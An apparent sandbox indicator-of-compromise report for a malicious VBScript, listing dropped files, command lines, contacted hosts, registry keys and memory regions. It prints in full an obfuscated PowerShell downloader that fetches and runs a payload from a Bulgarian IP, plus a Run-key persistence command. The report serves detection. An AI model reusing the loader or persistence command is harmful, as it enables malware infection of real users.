IOC Report
PO_La-Tanerie04180240124.vbs

loading gif

Files

File Path
Type
Category
Malicious
PO_La-Tanerie04180240124.vbs
ASCII text, with very long lines (308), with CRLF line terminators
initial sample
malicious
C:\Users\user\AppData\Roaming\lmouitrs.dat
data
dropped
malicious
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_20jmdb51.amd.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gs5gqbiv.qio.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tiy2gudj.whr.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vndyilgm.oe1.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Eyelike0.For
ASCII text, with very long lines (65536), with no line terminators
dropped

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO_La-Tanerie04180240124.vbs"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Bastanteresba = 1;$Excerptet='Substrin';$Excerptet+='g';Function Sughs($Spermophyte68){$Scurf=$Spermophyte68.Length-$Bastanteresba;For($Bastanteres=1; $Bastanteres -lt $Scurf; $Bastanteres+=(2)){$Anglophobes+=$Spermophyte68.$Excerptet.Invoke($Bastanteres, $Bastanteresba);}$Anglophobes;}function Thiocarbamic($Hydrodynamicist){. ($Sterlingkursen) ($Hydrodynamicist);}$udrj=Sughs 'TM oAzMikl lHaT/L5 .S0. (IWTi nPd.oMwOs. ANPT .1 0s.f0 ;. eWViHnD6F4,;c TxT6,4 ;F Dr vM:,1.2 1 .,0,)O eGGeCc,k oA/D2M0S1,0 0A1 0,1C WF i.r.e fHoEx / 1 2A1F. 0 ';$Lobularia=Sughs ',U.s eRr,- A g eDn tS ';$Daybeam=Sughs 'HhWt tLp :F/F/ 8.7a.R1Y2,1E. 1A0U5 .C1S6S3h/.F l y,v,n iCn gKs.. u.3 2D ';$Cololite=Sughs ' >M ';$Sterlingkursen=Sughs 'SiSe,xA ';$Thailndernes = Sughs 'reNchh o. U% a p p dEaGt aE%N\ E y.eMlRiAk.e.0 .aF.o,r H& &D Be cehSoT H$ ';Thiocarbamic (Sughs ' $ g.lTotbBaOlR:kBFaUc tCe,r iUoSp h aEg oRuUs,=N( c,mud, C/.c, V$ TVhHa i lBnIdAeGr nKe sB) ');Thiocarbamic (Sughs ' $ gBl,oSbBa l,:SDFiTaOsbtCeDr eso.i sEoPm eUrH=T$GDMa ySbJeTa.mK. s.p lPiSt,(,$ CUo l oUl iTtCeI)P ');$Daybeam=$Diastereoisomer[0];Thiocarbamic (Sughs ' $.gAlUo b a.lR: NAo.nUz eAbVrLaM=DNPe wF-,O,b,j eMc t HS y.sLtEeSmB.sN e t,.EW e b CslAi.e.nVtF ');Thiocarbamic (Sughs ' $,N o,n.z e.b,rBaB.AHLe aGdAe r sS[ $ LioAbCuTlDa r iRa,]U= $Ou,dbr,jA ');$Nonassigned=Sughs 'VN,oUn z eAb r,a ..DMoSwFn lOo,a dSFSi lIeh(C$ DTa yEb eAa m , $ FHo nRt,eTr.n.eRsD7P2 )B ';$Nonassigned=$Bacteriophagous[1]+$Nonassigned;$Fonternes72=$Bacteriophagous[0];Thiocarbamic (Sughs 'F$ gFlSo.b,a lF:RGAebn.kSo mSsRtReDn,sT=.(.TBe.s t -dPLa tAh J$BFCoSn,tMe r.n epse7 2 ) ');while (!$Genkomstens) {Thiocarbamic (Sughs ' $FgllHoFb,aGl,: F jAosrDt e,nRdMeAd.ealFeF=A$ tLrRu eD ') ;Thiocarbamic $Nonassigned;Thiocarbamic (Sughs ' SPtAa,r.tH- S lUeOe,pP 4P ');Thiocarbamic (Sughs 'V$Sg l oCb,aUl : GSe n k oGmSsPtFe n sA=G( Tke,s,tN-RPSaGtBhA M$ FPo n t,eOrAnteOsD7.2D)k ') ;Thiocarbamic (Sughs ' $Fg l o.bKa,l : SJtUr.aAt e g.iDcWaEl,=S$Mgkl oPbEa,lS: S e rLgCeVa,nNt.s 2,3N+G+ % $ DGiEa.sRt,e,rSemosi sBo,mVehrb. cCo uEnCt ') ;$Daybeam=$Diastereoisomer[$Strategical];}Thiocarbamic (Sughs 'P$,gAlMoNb a l :FPSrBaEeRlUe,c tToBrP S=, IGOeStB-CC o,n t efnBt u$.FDoDnOt evr nDe s.7V2T ');Thiocarbamic (Sughs 'O$ g lDoDbHaLlM:,FLiRjFiaa nOe,r eCs L=U E[ S,y sPt,e.mH.MCAo n,v.e,rDtK] : :SFNr.oDm BKaBsEeP6U4DSpt r isnlgE(C$ PCr aVe l e c.t.onrV) ');Thiocarbamic (Sughs 'C$.gBl,oSbSadl : M,aOe gMb o t, .= p[ASTyGs,t e m..GTDe.x tt.HE,n.cBo dKi nGg ] :U:FAMSCCtI I .GGFe t S.t rAi n gX(.$BF iDjRiCaAnCe.r e sN), ');Thiocarbamic (Sughs 'K$Gg l oMbSa lL: RPe,c,oAnVcPiLl i a tRi,oTn s = $LM aPeFgMb o.t..Bs uDbVsLt rFi nRg (,3,1 8T4 8K6W,s2A4.9T4P2P)A ');Thiocarbamic $Reconciliations;"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Eyelike0.For && echo $"
malicious
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Bastanteresba = 1;$Excerptet='Substrin';$Excerptet+='g';Function Sughs($Spermophyte68){$Scurf=$Spermophyte68.Length-$Bastanteresba;For($Bastanteres=1; $Bastanteres -lt $Scurf; $Bastanteres+=(2)){$Anglophobes+=$Spermophyte68.$Excerptet.Invoke($Bastanteres, $Bastanteresba);}$Anglophobes;}function Thiocarbamic($Hydrodynamicist){. ($Sterlingkursen) ($Hydrodynamicist);}$udrj=Sughs 'TM oAzMikl lHaT/L5 .S0. (IWTi nPd.oMwOs. ANPT .1 0s.f0 ;. eWViHnD6F4,;c TxT6,4 ;F Dr vM:,1.2 1 .,0,)O eGGeCc,k oA/D2M0S1,0 0A1 0,1C WF i.r.e fHoEx / 1 2A1F. 0 ';$Lobularia=Sughs ',U.s eRr,- A g eDn tS ';$Daybeam=Sughs 'HhWt tLp :F/F/ 8.7a.R1Y2,1E. 1A0U5 .C1S6S3h/.F l y,v,n iCn gKs.. u.3 2D ';$Cololite=Sughs ' >M ';$Sterlingkursen=Sughs 'SiSe,xA ';$Thailndernes = Sughs 'reNchh o. U% a p p dEaGt aE%N\ E y.eMlRiAk.e.0 .aF.o,r H& &D Be cehSoT H$ ';Thiocarbamic (Sughs ' $ g.lTotbBaOlR:kBFaUc tCe,r iUoSp h aEg oRuUs,=N( c,mud, C/.c, V$ TVhHa i lBnIdAeGr nKe sB) ');Thiocarbamic (Sughs ' $ gBl,oSbBa l,:SDFiTaOsbtCeDr eso.i sEoPm eUrH=T$GDMa ySbJeTa.mK. s.p lPiSt,(,$ CUo l oUl iTtCeI)P ');$Daybeam=$Diastereoisomer[0];Thiocarbamic (Sughs ' $.gAlUo b a.lR: NAo.nUz eAbVrLaM=DNPe wF-,O,b,j eMc t HS y.sLtEeSmB.sN e t,.EW e b CslAi.e.nVtF ');Thiocarbamic (Sughs ' $,N o,n.z e.b,rBaB.AHLe aGdAe r sS[ $ LioAbCuTlDa r iRa,]U= $Ou,dbr,jA ');$Nonassigned=Sughs 'VN,oUn z eAb r,a ..DMoSwFn lOo,a dSFSi lIeh(C$ DTa yEb eAa m , $ FHo nRt,eTr.n.eRsD7P2 )B ';$Nonassigned=$Bacteriophagous[1]+$Nonassigned;$Fonternes72=$Bacteriophagous[0];Thiocarbamic (Sughs 'F$ gFlSo.b,a lF:RGAebn.kSo mSsRtReDn,sT=.(.TBe.s t -dPLa tAh J$BFCoSn,tMe r.n epse7 2 ) ');while (!$Genkomstens) {Thiocarbamic (Sughs ' $FgllHoFb,aGl,: F jAosrDt e,nRdMeAd.ealFeF=A$ tLrRu eD ') ;Thiocarbamic $Nonassigned;Thiocarbamic (Sughs ' SPtAa,r.tH- S lUeOe,pP 4P ');Thiocarbamic (Sughs 'V$Sg l oCb,aUl : GSe n k oGmSsPtFe n sA=G( Tke,s,tN-RPSaGtBhA M$ FPo n t,eOrAnteOsD7.2D)k ') ;Thiocarbamic (Sughs ' $Fg l o.bKa,l : SJtUr.aAt e g.iDcWaEl,=S$Mgkl oPbEa,lS: S e rLgCeVa,nNt.s 2,3N+G+ % $ DGiEa.sRt,e,rSemosi sBo,mVehrb. cCo uEnCt ') ;$Daybeam=$Diastereoisomer[$Strategical];}Thiocarbamic (Sughs 'P$,gAlMoNb a l :FPSrBaEeRlUe,c tToBrP S=, IGOeStB-CC o,n t efnBt u$.FDoDnOt evr nDe s.7V2T ');Thiocarbamic (Sughs 'O$ g lDoDbHaLlM:,FLiRjFiaa nOe,r eCs L=U E[ S,y sPt,e.mH.MCAo n,v.e,rDtK] : :SFNr.oDm BKaBsEeP6U4DSpt r isnlgE(C$ PCr aVe l e c.t.onrV) ');Thiocarbamic (Sughs 'C$.gBl,oSbSadl : M,aOe gMb o t, .= p[ASTyGs,t e m..GTDe.x tt.HE,n.cBo dKi nGg ] :U:FAMSCCtI I .GGFe t S.t rAi n gX(.$BF iDjRiCaAnCe.r e sN), ');Thiocarbamic (Sughs 'K$Gg l oMbSa lL: RPe,c,oAnVcPiLl i a tRi,oTn s = $LM aPeFgMb o.t..Bs uDbVsLt rFi nRg (,3,1 8T4 8K6W,s2A4.9T4P2P)A ');Thiocarbamic $Reconciliations;"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Eyelike0.For && echo $"
malicious
C:\Program Files (x86)\Windows Mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Calpack" /t REG_EXPAND_SZ /d "%moorburner% -w 1 $Improvably=(Get-ItemProperty -Path 'HKCU:\Urealistiske\').Slotene;%moorburner% ($Improvably)"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Calpack" /t REG_EXPAND_SZ /d "%moorburner% -w 1 $Improvably=(Get-ItemProperty -Path 'HKCU:\Urealistiske\').Slotene;%moorburner% ($Improvably)"

URLs

Name
IP
Malicious
darvien99lakoustr01.duckdns.org
malicious
http://pesterbdd.com/images/Pester.png
unknown
malicious
http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
unknown
http://www.certplus.com/CRL/class3.crl0
unknown
http://www.e-me.lv/repository0
unknown
http://www.acabogacia.org/doc0
unknown
http://crl.chambersign.org/chambersroot.crl0
unknown
http://ocsp.suscerte.gob.ve0
unknown
http://87.121.105.163/YSnpkrCwWalJFSpN146.bindumpsSexaideca.org.pe/1/YSnpkrCwWalJFSpN146.bin
unknown
http://www.postsignum.cz/crl/psrootqca2.crl02
unknown
http://crl.dhimyotis.com/certignarootca.crl0
unknown
http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
unknown
http://www.chambersign.org1
unknown
http://www.pkioverheid.nl/policies/root-policy0
unknown
http://repository.swisssign.com/0
unknown
http://www.suscerte.gob.ve/lcr0#
unknown
http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
unknown
http://crl.ssc.lt/root-c/cacrl.crl0
unknown
http://postsignum.ttc.cz/crl/psrootqca2.crl0
unknown
http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
unknown
http://ca.disig.sk/ca/crl/ca_disig.crl0
unknown
http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0
unknown
http://www.certplus.com/CRL/class3P.crl0
unknown
http://www.suscerte.gob.ve/dpc0
unknown
http://www.certeurope.fr/reference/root2.crl0
unknown
http://www.certplus.com/CRL/class2.crl0
unknown
http://www.disig.sk/ca/crl/ca_disig.crl0
unknown
http://www.defence.gov.au/pki0
unknown
https://nuget.org/nuget.exe
unknown
http://www.sk.ee/cps/0
unknown
http://www.globaltrust.info0=
unknown
http://www.anf.es
unknown
http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09
unknown
http://87.121.105.163/Flyvnings.u32XR
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://crl.postsignum.cz/crl/psrootqca4.crl02
unknown
http://pki.registradores.org/normativa/index.htm0
unknown
http://policy.camerfirma.com0
unknown
http://www.ssc.lt/cps03
unknown
http://ocsp.pki.gva.es0
unknown
http://www.anf.es/es/address-direccion.html
unknown
https://www.anf.es/address/)1(0&
unknown
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
unknown
http://ca.mtin.es/mtin/ocsp0
unknown
http://crl.ssc.lt/root-b/cacrl.crl0
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0
unknown
http://web.ncdc.gov.sa/crl/nrcacomb1.crl0
unknown
http://www.certicamara.com/dpc/0Z
unknown
http://www.uce.gub.uy/informacion-tecnica/politicas/cp_acrn.pdf0G
unknown
https://go.micro
unknown
https://wwww.certigna.fr/autorites/0m
unknown
http://www.dnie.es/dpc0
unknown
http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
unknown
https://contoso.com/Icon
unknown
http://87.121.105.163
unknown
http://ca.mtin.es/mtin/DPCyPoliticas0
unknown
https://www.anf.es/AC/ANFServerCA.crl0
unknown
https://aka.ms/pscore6lBkq
unknown
https://repository.tsp.zetes.com0
unknown
http://87.121.105.163/Flyvnings.u32
87.121.105.163
http://www.globaltrust.info0
unknown
http://certificates.starfieldtech.com/repository/1604
unknown
http://acedicom.edicomgroup.com/doc0
unknown
http://www.certplus.com/CRL/class3TS.crl0
unknown
https://github.com/Pester/Pester
unknown
https://crl.anf.es/AC/ANFServerCA.crl0
unknown
http://87.121.105.163/YSnpkrCwWalJFSpN146.bin
87.121.105.163
http://www.certeurope.fr/reference/pc-root2.pdf0
unknown
http://ac.economia.gob.mx/last.crl0G
unknown
https://www.catcert.net/verarrel
unknown
http://www.disig.sk/ca0f
unknown
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
unknown
http://www.e-szigno.hu/RootCA.crl
unknown
http://www.sk.ee/juur/crl/0
unknown
http://crl.chambersign.org/chambersignroot.crl0
unknown
http://crl.xrampsecurity.com/XGCA.crl0
unknown
http://certs.oati.net/repository/OATICA2.crl0
unknown
http://crl.oces.trust2408.com/oces.crl0
unknown
http://www.quovadis.bm0
unknown
http://crl.ssc.lt/root-a/cacrl.crl0
unknown
http://certs.oaticerts.com/repository/OATICA2.crl
unknown
http://certs.oati.net/repository/OATICA2.crt0
unknown
http://www.accv.es00
unknown
http://www.pkioverheid.nl/policies/root-policy-G20
unknown
https://www.netlock.net/docs
unknown
http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
unknown
http://www.e-trust.be/CPS/QNcerts
unknown
http://ocsp.ncdc.gov.sa0
unknown
http://fedir.comsign.co.il/crl/ComSignCA.crl0
unknown
http://acraiz.icpbrasil.gov.br/LCRacraizv5.crl0
unknown
http://crl2.postsignum.cz/crl/psrootqca4.crl01
unknown
http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
unknown
http://web.ncdc.gov.sa/crl/nrcaparta1.crl
unknown
http://www.datev.de/zertifikat-policy-int0
unknown
http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;
unknown
https://repository.luxtrust.lu0
unknown
http://cps.chambersign.org/cps/chambersroot.html0
unknown
https://contoso.com/License
unknown
http://www.acabogacia.org0
unknown
There are 90 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
darvien99lakoustr01.duckdns.org
94.156.79.69
malicious
bg.microsoft.map.fastly.net
199.232.214.172

IPs

IP
Domain
Country
Malicious
94.156.79.69
darvien99lakoustr01.duckdns.org
Bulgaria
malicious
87.121.105.163
unknown
Bulgaria

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Urealistiske
Slotene
HKEY_CURRENT_USER\Environment
moorburner
HKEY_CURRENT_USER\SOFTWARE\akmsnxbfg-E906PA
exepath
HKEY_CURRENT_USER\SOFTWARE\akmsnxbfg-E906PA
licence
HKEY_CURRENT_USER\SOFTWARE\akmsnxbfg-E906PA
time
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Calpack
There are 10 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
59B3000
trusted library allocation
page read and write
malicious
9092000
direct allocation
page execute and read and write
malicious
1E3D03D0000
trusted library allocation
page read and write
malicious
5159000
heap
page read and write
malicious
8610000
direct allocation
page execute and read and write
malicious
1E3BE729000
heap
page read and write
722E000
heap
page read and write
74F0000
trusted library allocation
page read and write
27B9BF3F000
heap
page read and write
207BE000
stack
page read and write
7FFD9BA60000
trusted library allocation
page read and write
7FFD9BA11000
trusted library allocation
page read and write
281C000
heap
page read and write
50F9000
heap
page read and write
45FC000
stack
page read and write
6C30000
direct allocation
page read and write
2810000
heap
page read and write
207FF000
stack
page read and write
4F70000
heap
page read and write
6DDB000
stack
page read and write
7FFD9B946000
trusted library allocation
page execute and read and write
72AB000
heap
page read and write
9AEEAF9000
stack
page read and write
848C000
stack
page read and write
2B90000
heap
page read and write
1E3C0AFD000
trusted library allocation
page read and write
2AEF000
stack
page read and write
27B9BFB6000
heap
page read and write
1E3C1AAF000
trusted library allocation
page read and write
27B9DD03000
heap
page read and write
27B9DE3E000
heap
page read and write
27B9DE43000
heap
page read and write
27B9DEA0000
heap
page read and write
8010000
heap
page read and write
1E3C0B35000
trusted library allocation
page read and write
27B9DE93000
heap
page read and write
200B0000
direct allocation
page read and write
27B9BFBD000
heap
page read and write
2091E000
stack
page read and write
513E000
heap
page read and write
27B9DE9D000
heap
page read and write
20C6D000
stack
page read and write
27B9DE86000
heap
page read and write
840E000
stack
page read and write
7FFD9BBC0000
trusted library allocation
page read and write
1E3BE6B5000
heap
page read and write
27B9BFB5000
heap
page read and write
27B9DCBD000
heap
page read and write
7FFD9BB30000
trusted library allocation
page read and write
50C0000
direct allocation
page read and write
27B9DE4A000
heap
page read and write
294E000
unkown
page read and write
2A5E000
unkown
page read and write
27B9E083000
heap
page read and write
27B9DE2F000
heap
page read and write
6C40000
direct allocation
page read and write
27B9BF30000
heap
page read and write
200A0000
direct allocation
page read and write
74C0000
trusted library allocation
page execute and read and write
44C0000
trusted library allocation
page read and write
27B9D840000
remote allocation
page read and write
1E3C0583000
trusted library allocation
page read and write
7077000
trusted library allocation
page read and write
20100000
direct allocation
page read and write
1E3C0165000
heap
page read and write
7FFD9BB40000
trusted library allocation
page read and write
50A0000
heap
page readonly
27B9DE13000
heap
page read and write
28E0000
heap
page read and write
7540000
trusted library allocation
page read and write
7FFD9BBD0000
trusted library allocation
page read and write
1E3BE769000
heap
page read and write
1E3D8840000
heap
page execute and read and write
27B9BEC0000
heap
page read and write
7FFD9B87B000
trusted library allocation
page read and write
27B9BF9C000
heap
page read and write
4811000
trusted library allocation
page read and write
1E3C1AB4000
trusted library allocation
page read and write
4150000
remote allocation
page execute and read and write
228E58E0000
heap
page read and write
27B9DE82000
heap
page read and write
7510000
trusted library allocation
page read and write
47DE000
stack
page read and write
27B9DE07000
heap
page read and write
7FFD9BBB0000
trusted library allocation
page read and write
27B9BFCC000
heap
page read and write
27B9BFD0000
heap
page read and write
2054D000
stack
page read and write
1E3BE6E0000
heap
page read and write
27B9DE7C000
heap
page read and write
6C20000
direct allocation
page read and write
27B9DCE7000
heap
page read and write
27B9DEDA000
heap
page read and write
66205FE000
stack
page read and write
8630000
direct allocation
page read and write
27B9DF1A000
heap
page read and write
2E7F000
stack
page read and write
7520000
trusted library allocation
page read and write
5839000
trusted library allocation
page read and write
20140000
direct allocation
page read and write
2A60000
heap
page read and write
27B9BF9C000
heap
page read and write
1E3C1FA4000
trusted library allocation
page read and write
1E3C0361000
trusted library allocation
page read and write
4755000
heap
page execute and read and write
459E000
stack
page read and write
27B9DE81000
heap
page read and write
850D000
stack
page read and write
27B9DDB3000
heap
page read and write
27B9DF66000
heap
page read and write
7350000
trusted library allocation
page read and write
27B9DE41000
heap
page read and write
292E000
stack
page read and write
1E3D0659000
trusted library allocation
page read and write
7FFD9BB90000
trusted library allocation
page read and write
1E3D86E0000
heap
page read and write
7FFD9BAE0000
trusted library allocation
page read and write
206C0000
heap
page read and write
20AEE000
stack
page read and write
27B9DE82000
heap
page read and write
8640000
direct allocation
page read and write
7FFD9BA1A000
trusted library allocation
page read and write
27B9DCEA000
heap
page read and write
50FD000
heap
page read and write
1E3BE6D0000
trusted library allocation
page read and write
44F0000
trusted library allocation
page read and write
27B9BFE3000
heap
page read and write
20150000
direct allocation
page read and write
1E3D8870000
heap
page read and write
2CA0000
heap
page read and write
27B9BFB9000
heap
page read and write
27B9BF2A000
heap
page read and write
4640000
trusted library allocation
page execute and read and write
42B2000
remote allocation
page execute and read and write
2978000
heap
page read and write
5162000
heap
page read and write
27B9BFC0000
heap
page read and write
7FFD9BA42000
trusted library allocation
page read and write
27B9DDBC000
heap
page read and write
2B70000
heap
page read and write
27B9BF9C000
heap
page read and write
228E59C5000
heap
page read and write
6E5B000
stack
page read and write
25C0000
heap
page read and write
2CE0000
heap
page read and write
20090000
direct allocation
page read and write
27B9D840000
remote allocation
page read and write
2AFE000
heap
page read and write
27B9BF30000
heap
page read and write
662148D000
stack
page read and write
27B9BFCC000
heap
page read and write
27B9DE13000
heap
page read and write
27B9DCBC000
heap
page read and write
27B9DCD0000
heap
page read and write
27B9DCCA000
heap
page read and write
27B9DE3C000
heap
page read and write
6E1E000
stack
page read and write
4677000
heap
page read and write
27B9DE2E000
heap
page read and write
27B9DCA0000
heap
page read and write
8080000
trusted library allocation
page read and write
44D0000
trusted library allocation
page read and write
27B9DDA0000
heap
page read and write
27B9DE02000
heap
page read and write
44A3000
trusted library allocation
page execute and read and write
7FFD9B86D000
trusted library allocation
page execute and read and write
2BC7000
heap
page read and write
27B9BFBE000
heap
page read and write
463E000
stack
page read and write
9AEECFE000
stack
page read and write
7210000
heap
page read and write
7FFD9B980000
trusted library allocation
page execute and read and write
200D0000
direct allocation
page read and write
20A6C000
stack
page read and write
6C00000
direct allocation
page read and write
1E3BE680000
trusted library allocation
page read and write
208B0000
direct allocation
page read and write
7FFD9BAA0000
trusted library allocation
page read and write
2A8E000
stack
page read and write
7FFD9BBA0000
trusted library allocation
page read and write
5070000
heap
page read and write
1E3D86A0000
heap
page read and write
27B9DE20000
heap
page read and write
662140E000
stack
page read and write
27B9DCDF000
heap
page read and write
7FFD9B860000
trusted library allocation
page read and write
27B9DCC2000
heap
page read and write
8F30000
direct allocation
page execute and read and write
27B9DE7F000
heap
page read and write
27B9DDC6000
heap
page read and write
23BD000
stack
page read and write
8600000
trusted library allocation
page execute and read and write
228E59D0000
heap
page read and write
662158B000
stack
page read and write
2AAE000
stack
page read and write
9AEEFFE000
stack
page read and write
1E3C0350000
heap
page execute and read and write
50D8000
heap
page read and write
1E3C0981000
trusted library allocation
page read and write
27B9BF29000
heap
page read and write
27B9DE62000
heap
page read and write
7FFD9B862000
trusted library allocation
page read and write
4750000
heap
page execute and read and write
27B9BFB9000
heap
page read and write
85E0000
trusted library allocation
page read and write
27B9BFCC000
heap
page read and write
2060E000
stack
page read and write
20BEC000
stack
page read and write
85D0000
trusted library allocation
page read and write
7FFD9BB00000
trusted library allocation
page read and write
4F80000
heap
page read and write
1E3BE6A0000
trusted library allocation
page read and write
75A0000
trusted library allocation
page read and write
20B2F000
stack
page read and write
46BE000
stack
page read and write
1E3BE721000
heap
page read and write
2730000
heap
page read and write
27B9DE97000
heap
page read and write
27B9DF6B000
heap
page read and write
27B9DF5D000
heap
page read and write
1E3BE741000
heap
page read and write
7FFD9BA20000
trusted library allocation
page execute and read and write
2D70000
heap
page read and write
736A000
trusted library allocation
page read and write
27B9DCC0000
heap
page read and write
27B9BF3D000
heap
page read and write
27B9DCAA000
heap
page read and write
27B9DE4A000
heap
page read and write
46FF000
stack
page read and write
27B9DCF2000
heap
page read and write
27B9BFDC000
heap
page read and write
84CB000
stack
page read and write
7F90000
trusted library allocation
page read and write
2AC0000
heap
page read and write
7FFD9BAB0000
trusted library allocation
page read and write
27B9DCCC000
heap
page read and write
7F77000
stack
page read and write
2058D000
stack
page read and write
7FFD9BA70000
trusted library allocation
page read and write
2095F000
stack
page read and write
27B9DE2E000
heap
page read and write
209AE000
stack
page read and write
6D9D000
stack
page read and write
27B9D860000
heap
page read and write
27B9DE62000
heap
page read and write
27B9DE74000
heap
page read and write
27B9DCEF000
heap
page read and write
27B9DCAF000
heap
page read and write
27B9BFAD000
heap
page read and write
7302000
heap
page read and write
44D2000
trusted library allocation
page read and write
9A92000
direct allocation
page execute and read and write
2CE9000
heap
page read and write
27B9E08A000
heap
page read and write
66209BE000
stack
page read and write
4670000
heap
page read and write
7340000
trusted library allocation
page read and write
473E000
stack
page read and write
27B9DE02000
heap
page read and write
27B9DF25000
heap
page read and write
27B9DEC4000
heap
page read and write
27B9BFA7000
heap
page read and write
1E3BE6B0000
heap
page read and write
27B9BFD0000
heap
page read and write
4800000
heap
page execute and read and write
208D0000
direct allocation
page read and write
7FA0000
trusted library allocation
page read and write
27B9BF3D000
heap
page read and write
44A4000
trusted library allocation
page read and write
96124FE000
unkown
page read and write
2CD0000
trusted library section
page read and write
27B9DE43000
heap
page read and write
25D0000
heap
page read and write
73EE000
stack
page read and write
27B9DCAE000
heap
page read and write
800E000
stack
page read and write
44CA000
trusted library allocation
page execute and read and write
27B9BFC9000
heap
page read and write
1E3D0370000
trusted library allocation
page read and write
205CD000
stack
page read and write
7FFD9BB50000
trusted library allocation
page read and write
844C000
stack
page read and write
1E3C0130000
heap
page execute and read and write
8320000
trusted library allocation
page read and write
858E000
stack
page read and write
7560000
heap
page read and write
27B9BEA0000
heap
page read and write
27B9BFCC000
heap
page read and write
6620A3B000
stack
page read and write
20AAC000
stack
page read and write
27B9DCB4000
heap
page read and write
27B9DCB5000
heap
page read and write
27B9DCD1000
heap
page read and write
27B9DE0F000
heap
page read and write
251D000
stack
page read and write
27B9DEE1000
heap
page read and write
204D0000
heap
page read and write
80D5000
heap
page read and write
27B9DF5D000
heap
page read and write
4870000
trusted library allocation
page read and write
7FFD9B91C000
trusted library allocation
page execute and read and write
27B9DCAD000
heap
page read and write
20B6B000
stack
page read and write
27B9BF3D000
heap
page read and write
50D0000
heap
page read and write
709E000
stack
page read and write
1E3C0B19000
trusted library allocation
page read and write
27B9DCA1000
heap
page read and write
27B9DF1A000
heap
page read and write
9AEF0FB000
stack
page read and write
27B9DE62000
heap
page read and write
228E59F0000
heap
page read and write
7370000
trusted library allocation
page read and write
27B9BFAF000
heap
page read and write
27B9DE86000
heap
page read and write
27B9BF00000
heap
page read and write
7FFD9BA80000
trusted library allocation
page read and write
82F5000
trusted library allocation
page read and write
